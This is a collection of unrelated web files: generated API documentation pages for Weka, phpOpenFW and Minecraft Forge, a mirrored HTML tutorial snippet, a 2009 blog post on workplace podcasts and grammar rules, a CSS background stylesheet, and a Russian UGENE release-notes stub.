<A HREF="../../../weka/classifiers/mi/MISMO.html" title="class in weka.classifiers.mi"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?weka/classifiers/mi/MIOptimalBall.html" target="_top"><B>FRAMES</B></A>
<A HREF="MIOptimalBall.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
doc/phpOpenFW/Core/_core---controller_common.inc.php.html | cclark61/phpOpenFW | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs for page controller_common.inc.php</title>
<link rel="stylesheet" href="../../media/stylesheet.css" />
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
</head>
<body>
<div class="page-body">
<h2 class="file-name"><img src="../../media/images/Page_logo.png" alt="File" style="vertical-align: middle">/core/controller_common.inc.php</h2>
<a name="sec-description"></a>
<div class="info-box">
<div class="info-box-title">Description</div>
<div class="nav-bar">
<span class="disabled">Description</span> |
<a href="#sec-functions">Functions</a>
</div>
<div class="info-box-body">
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Common Controller Functions</p>
<ul class="tags">
<li><span class="field">author:</span> Christian J. Clark</li>
<li><span class="field">version:</span> Started: 12/19/2011, Last updated: 1/26/2016</li>
<li><span class="field">copyright:</span> Copyright (c) Christian J. Clark</li>
<li><span class="field">filesource:</span> <a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html">Source Code for this file</a></li>
<li><span class="field">license:</span> <a href="http://www.gnu.org/licenses/gpl-2.0.txt">http://www.gnu.org/licenses/gpl-2.0.txt</a></li>
</ul>
</div>
</div>
<a name="sec-functions"></a>
<div class="info-box">
<div class="info-box-title">Functions</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<span class="disabled">Functions</span>
</div>
<div class="info-box-body">
<a name="functiondefault_data_source" id="functiondefault_data_source"><!-- --></a>
<div class="oddrow">
<div>
<img src="../../media/images/Function.png" />
<span class="method-title">default_data_source</span> (line <span class="line-number"><a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html#a90">90</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Set Default Data Source Function</p>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
default_data_source
</span>
(<span class="var-type">string</span> <span class="var-name">$index</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">string</span>
<span class="var-name">$index</span><span class="var-description">: Data Source Index</span> </li>
</ul>
</div>
<a name="functionload_form_elements" id="functionload_form_elements"><!-- --></a>
<div class="evenrow">
<div>
<img src="../../media/images/Function.png" />
<span class="method-title">load_form_elements</span> (line <span class="line-number"><a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html#a23">23</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Load Form Element Classes Function</p>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
load_form_elements
</span>
()
</div>
</div>
<a name="functionload_plugin" id="functionload_plugin"><!-- --></a>
<div class="oddrow">
<div>
<img src="../../media/images/Function.png" />
<span class="method-title">load_plugin</span> (line <span class="line-number"><a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html#a196">196</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Load Plugin Function</p>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
load_plugin
</span>
(<span class="var-type">string</span> <span class="var-name">$plugin</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">string</span>
<span class="var-name">$plugin</span><span class="var-description">: The Name of the plugin without the ".inc.php"</span> </li>
</ul>
</div>
<a name="functionreg_data_source" id="functionreg_data_source"><!-- --></a>
<div class="evenrow">
<div>
<img src="../../media/images/Function.png" />
<span class="method-title">reg_data_source</span> (line <span class="line-number"><a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html#a50">50</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Register Data Source Function</p>
<p class="description"><p>Register a new data source in the Session</p></p>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
reg_data_source
</span>
(<span class="var-type">string</span> <span class="var-name">$ds_index</span>, <span class="var-type">array</span> <span class="var-name">$ds_params</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">string</span>
<span class="var-name">$ds_index</span><span class="var-description">: Data source index name</span> </li>
<li>
<span class="var-type">array</span>
<span class="var-name">$ds_params</span><span class="var-description">: Data source parameter array</span> </li>
</ul>
</div>
<a name="functionset_plugin_folder" id="functionset_plugin_folder"><!-- --></a>
<div class="oddrow">
<div>
<img src="../../media/images/Function.png" />
<span class="method-title">set_plugin_folder</span> (line <span class="line-number"><a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html#a115">115</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Set External Plugin Folder</p>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
set_plugin_folder
</span>
(<span class="var-type">string</span> <span class="var-name">$dir</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">string</span>
<span class="var-name">$dir</span><span class="var-description">: File path to plugin folder</span> </li>
</ul>
</div>
<a name="functionunset_plugin_folder" id="functionunset_plugin_folder"><!-- --></a>
<div class="evenrow">
<div>
<img src="../../media/images/Function.png" />
<span class="method-title">unset_plugin_folder</span> (line <span class="line-number"><a href="../../__filesource/fsource_phpOpenFW_Core_corecontroller_common.inc.php.html#a156">156</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Unset External Plugin Folder</p>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
unset_plugin_folder
</span>
(<span class="var-type">string</span> <span class="var-name">$dir</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">string</span>
<span class="var-name">$dir</span><span class="var-description">: File path to plugin folder</span> </li>
</ul>
</div>
</div>
</div>
<p class="notes" id="credit">
Documentation generated on Mon, 18 Jul 2016 04:00:06 +0000 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.1</a>
</p>
</div></body>
</html> |
Coding/W3School/W3CN/www.w3school.com.cn/tiy/loadtexte0c5.html | platinhom/ManualHom | <html>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=html_abbracronym by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:02:41 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<body>
<abbr title="etcetera">etc.</abbr>
<br />
<acronym title="World Wide Web">WWW</acronym>
<p>在某些浏览器中,当您把鼠标移至缩略词语上时,title 可用于展示表达的完整版本。</p>
<p>仅对于 IE 5 中的 acronym 元素有效。</p>
<p>对于 Netscape 6.2 中的 abbr 和 acronym 元素都有效。</p>
</body>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=html_abbracronym by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:02:41 GMT -->
</html> |
_posts/2009/2009-05-20-sailboats-and-cruise-ships-or-how-my-work-podcast-was-dwarfed-by-a-mega-work-podcast.html | tomjohnson1492/tomjohnson1492.github.io | ---
layout: post
title: Sailboats and Cruise Ships, or, How My Work Podcast Was Dwarfed by a Mega Work
Podcast
date: 2009-05-20 22:16:30.000000000 -07:00
categories:
- technical-writing
tags:
- metaphors
- mormon
- Podcasting
- radio.lds.org
status: publish
published: true
---
<p>A couple of months ago, I wanted to start a podcast at my work, and so <a href="http://tech.lds.org/index.php?option=com_content&view=article&id=231:the-evolution-of-the-churchs-it-department&catid=1:miscellanous">I interviewed someone</a> who has been in our IT department for 28 years about the evolution of the department over the years.</p>
<p>The podcast took about a month to get approved, and the week before it was posted, as I was tracking down the person who controlled our iTunes feed and Feedburner, I found that another department, Digital Media, was in the process of launching a full-scale dedicated radio station with 24/7 programming and more than a dozen new shows, with new episodes published weekly, also downloadable as podcasts. <a href="http://radio.lds.org/">Radio.lds.org</a> allows you to listen to a live stream of programming online or, if you have an HD Radio in certain cities, you can listen in your car. All the shows also <a href="http://radio.lds.org/mc/eng/podcasts">have feeds in iTunes</a>, so they double as podcasts on your iPod.</p>
<p>The podcasts at radio.lds.org target a <a href="http://mormon.org" target="_blank">Mormon</a> audience, but you may find the <a href="http://feeds.lds.org/EverythingCreative">Everything Creative</a> show interesting. Some of the other podcasts include informal conversations with leaders, stories related at conferences, a history of hymns, scripture stories, and other topics. The focus on conversations and stories is right on target. </p>
<p>Seeing this full-scale podcasting effort (I hope they haven't underestimated the work necessary to keep this going), made me rethink my work podcast. There's no longer a need, because it is being fully filled elsewhere, through another department.</p>
<p>A few years ago, as I was transitioning from a startup to a large company and feeling a little frustrated by the bureaucracy of approval required for nearly everything, an older colleague explained this metaphor. She told me small companies are like sailboats, nimble, quick and able to turn sharply, without much notice. Large companies, on the other hand, are like cruise ships. Massive and heavy -- it takes them half a mile just to turn around. But while slow, they can also do incredibly powerful things.</p>
<p>I apply this metaphor to the podcasts. My little work podcast, which strangely seems the product of an IT startup, even though it is part of the same organization, is buried in the shadows of Radio.LDS.org's gigantic all-consuming 24/7 radio station/media outlet/podcast deluge.</p>
<p>While on the topic of podcasts, the other day Gordon McLean of One Man Writes <a href="http://www.onemanwrites.co.uk/2009/05/18/podcasts/">asked listeners what their favorite podcasts are</a>. Here's what I listen to regularly on my iPod right now: <a href="http://www.itauthor.com/">IT Author</a>, <a href="http://www.wptavern.com/wordpress-weekly">Wordpress weekly</a>, <a href="http://boagworld.com/">Boagworld</a>, <a href="http://wp-community.org/">The WordPress Podcast</a>, <a href="http://www.thisamericanlife.org/">This American Life</a>, <a href="http://indesignsecrets.com">InDesign Secrets</a>, <a href="http://www.uie.com/brainsparks/">Brain Sparks</a>, <a href="http://www.npr.org/rss/podcast/podcast_detail.php?siteId=4819382">NPR Technology Podcast</a>, <a href="http://twit.tv/twit">This Week in Tech</a>, and <a href="http://grammar.quickanddirtytips.com/">Grammar Girl</a>.</p>
<p>My favorite podcast of the week is the <a href="http://www.itauthor.com/2009/04/25/itauthor-podcast-28-professor-geoffrey-pullum-and-the-elements-of-style/">IT Author interview of Geoffrey Pullum</a>, an English professor who debunks many assertions in Strunk and White's <em>Elements of Style</em> and Fowler's <em>Modern English Usage</em>. I learned some interesting things about grammar from the interview. First, the <em>that</em> <em>versus which</em> rule, using "that" for restrictive clauses and "which" for non-restrictive clauses, appears to be an invention by Fowler in the early part of the twentieth century.</p>
<p>And Strunk and White's enforcement of singular verbs with certain pronouns (for example, "<strong>None</strong> of us <strong>has</strong> an umbrella" rather than "<strong>None</strong> of us <strong>have</strong> an umbrella") also seems to be a rule invention, not in keeping with the accepted grammar of his day.</p>
<p>I consider myself fortunate to live in a time when so much information is available and consumable for free.</p>
|
templates/kalite/css/background/gradient_turquoise.css | kosmosby/medicine-prof | /* Background: Gradient Turquoise
----------------------------------------------------------------------------------------------------*/
body#page { background: #378B84; }
@media only screen and (min-device-width: 769px) {
body#page {
background: #378B84 url(../../images/background/gradient_turquoise/gradient.svg) 50% 0 repeat-y fixed;
background-size: 100% 1500px;
}
.wrapper {
-moz-box-shadow:
0 0 5px rgba(0,0,0,0.4),
0 0 100px rgba(140,215,210,0.6);
-webkit-box-shadow:
0 0 5px rgba(0,0,0,0.4),
0 0 200px rgba(140,215,210,0.6);
box-shadow:
0 0 5px rgba(0,0,0,0.4),
0 0 100px rgba(140,215,210,0.6);
}
}
/* WidgetKit
----------------------------------------------------------------------------------------------------*/
/* Slideshow */
.wk-slideshow-downtown .nav span { background-image: url(../../images/widgetkit/color/turquoise/nav.png); }
.wk-slideshow-downtown > div .next,
.wk-slideshow-downtown > div .prev { background-image: url(../../images/widgetkit/color/turquoise/buttons.png); }
|
src/ugeneui/html/version_news_ru.html | ugeneunipro/ugene | <!--
UGENE - Integrated Bioinformatics Tools.
Copyright (C) 2008-2022 UniPro <ugene@unipro.ru>
http://ugene.net
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
-->
<h3>Изменения в UGENE версии 42</h3>
<ul style="margin-top: 10px; margin-bottom: 10px;">
<li style="margin-bottom: 10px;"> Это версия для разработчиков.</li>
<li style="margin-bottom: 10px;"> Список изменений будет заполнен в релизной версии.</li>
</ul>
<p>
Подробности смотрите на <a href="https://ugene.net/ru/changelist.html">сайте UGENE</a>.
</p>
|
javascript/basics/classe.html | santanche/web2learn | <html>
<head>
<script type="text/javascript" src="classe.js">
</script>
</head>
<body>
<p onclick="exemplo01()" style="color:blue;font-weight:bold;cursor:pointer">
Exemplo 01
</p>
<p onclick="exemplo02()" style="color:blue;font-weight:bold;cursor:pointer">
Exemplo 02
</p>
<h1>Resultados</h1>
<div id="resultados"></div>
</body>
</html> |
1.7.10_Forge_Documents/net/minecraft/inventory/InventoryLargeChest.html | Gullanshire/Minecraft_Mod-The_Exorcist | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_65) on Sun Jan 11 16:06:58 EST 2015 -->
<title>InventoryLargeChest (Forge API)</title>
<meta name="date" content="2015-01-11">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="InventoryLargeChest (Forge API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../net/minecraft/inventory/InventoryEnderChest.html" title="class in net.minecraft.inventory"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../net/minecraft/inventory/InventoryMerchant.html" title="class in net.minecraft.inventory"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?net/minecraft/inventory/InventoryLargeChest.html" target="_top">Frames</a></li>
<li><a href="InventoryLargeChest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">net.minecraft.inventory</div>
<h2 title="Class InventoryLargeChest" class="title">Class InventoryLargeChest</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>net.minecraft.inventory.InventoryLargeChest</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></dd>
</dl>
<hr>
<br>
<pre>public class <span class="strong">InventoryLargeChest</span>
extends java.lang.Object
implements <a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></pre>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#InventoryLargeChest(java.lang.String,%20net.minecraft.inventory.IInventory,%20net.minecraft.inventory.IInventory)">InventoryLargeChest</a></strong>(java.lang.String p_i1559_1_,
<a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a> p_i1559_2_,
<a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a> p_i1559_3_)</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#closeInventory()">closeInventory</a></strong>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#decrStackSize(int,%20int)">decrStackSize</a></strong>(int p_70298_1_,
int p_70298_2_)</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#getInventoryName()">getInventoryName</a></strong>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>int</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#getInventoryStackLimit()">getInventoryStackLimit</a></strong>()</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>int</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#getSizeInventory()">getSizeInventory</a></strong>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#getStackInSlot(int)">getStackInSlot</a></strong>(int p_70301_1_)</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#getStackInSlotOnClosing(int)">getStackInSlotOnClosing</a></strong>(int p_70304_1_)</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#hasCustomInventoryName()">hasCustomInventoryName</a></strong>()</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#isItemValidForSlot(int,%20net.minecraft.item.ItemStack)">isItemValidForSlot</a></strong>(int p_94041_1_,
<a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> p_94041_2_)</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#isPartOfLargeChest(net.minecraft.inventory.IInventory)">isPartOfLargeChest</a></strong>(<a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a> p_90010_1_)</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#isUseableByPlayer(net.minecraft.entity.player.EntityPlayer)">isUseableByPlayer</a></strong>(<a href="../../../net/minecraft/entity/player/EntityPlayer.html" title="class in net.minecraft.entity.player">EntityPlayer</a> p_70300_1_)</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#markDirty()">markDirty</a></strong>()</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#openInventory()">openInventory</a></strong>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/inventory/InventoryLargeChest.html#setInventorySlotContents(int,%20net.minecraft.item.ItemStack)">setInventorySlotContents</a></strong>(int p_70299_1_,
<a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> p_70299_2_)</code> </td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="InventoryLargeChest(java.lang.String, net.minecraft.inventory.IInventory, net.minecraft.inventory.IInventory)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>InventoryLargeChest</h4>
<pre>public InventoryLargeChest(java.lang.String p_i1559_1_,
<a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a> p_i1559_2_,
<a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a> p_i1559_3_)</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="getSizeInventory()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getSizeInventory</h4>
<pre>public int getSizeInventory()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#getSizeInventory()">getSizeInventory</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="isPartOfLargeChest(net.minecraft.inventory.IInventory)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>isPartOfLargeChest</h4>
<pre>public boolean isPartOfLargeChest(<a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a> p_90010_1_)</pre>
</li>
</ul>
<a name="getInventoryName()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getInventoryName</h4>
<pre>public java.lang.String getInventoryName()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#getInventoryName()">getInventoryName</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="hasCustomInventoryName()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>hasCustomInventoryName</h4>
<pre>public boolean hasCustomInventoryName()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#hasCustomInventoryName()">hasCustomInventoryName</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="getStackInSlot(int)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getStackInSlot</h4>
<pre>public <a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> getStackInSlot(int p_70301_1_)</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#getStackInSlot(int)">getStackInSlot</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="decrStackSize(int, int)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>decrStackSize</h4>
<pre>public <a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> decrStackSize(int p_70298_1_,
int p_70298_2_)</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#decrStackSize(int,%20int)">decrStackSize</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="getStackInSlotOnClosing(int)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getStackInSlotOnClosing</h4>
<pre>public <a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> getStackInSlotOnClosing(int p_70304_1_)</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#getStackInSlotOnClosing(int)">getStackInSlotOnClosing</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="setInventorySlotContents(int, net.minecraft.item.ItemStack)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setInventorySlotContents</h4>
<pre>public void setInventorySlotContents(int p_70299_1_,
<a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> p_70299_2_)</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#setInventorySlotContents(int,%20net.minecraft.item.ItemStack)">setInventorySlotContents</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="getInventoryStackLimit()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getInventoryStackLimit</h4>
<pre>public int getInventoryStackLimit()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#getInventoryStackLimit()">getInventoryStackLimit</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="markDirty()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>markDirty</h4>
<pre>public void markDirty()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#markDirty()">markDirty</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="isUseableByPlayer(net.minecraft.entity.player.EntityPlayer)">
<!-- -->
</a>
